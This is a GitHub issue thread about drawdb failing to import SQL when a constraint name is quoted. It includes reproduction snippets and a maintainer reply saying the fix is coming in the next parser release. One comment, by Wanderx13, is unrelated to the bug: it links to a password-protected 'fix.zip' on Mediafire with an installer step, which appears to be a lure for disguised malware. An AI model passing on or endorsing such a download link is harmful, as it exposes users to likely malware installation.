### ISSUE TITLE
[BUG] Import failed with quoted constraint name

### ISSUE THREAD

**Issue by Igorgro** [drawdb-io/drawdb#230]
**Describe the bug**
When SQL code contains quoted constraint name, it is failed to import

**To Reproduce**
1. Try to import the following code:
    ```sql
    CREATE TABLE books (
        id UUID NOT NULL,
        CONSTRAINT "PK_books" PRIMARY KEY (id)
    );
    ```
2. See error (on attached screenshot)
3. The following code does not produce error:
    ```sql
    CREATE TABLE books (
        id UUID NOT NULL,
        CONSTRAINT PK_books PRIMARY KEY (id)
    );
    ```

**Expected behavior**
SQL script successfully imported

**Screenshots**
![image](https://github.com/user-attachments/assets/98b212ba-cb69-4fb6-b007-e04876ab6052)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1ilit** [comment]
Yep, this was reported and fixed. In the next release of the parser this will not be a problem
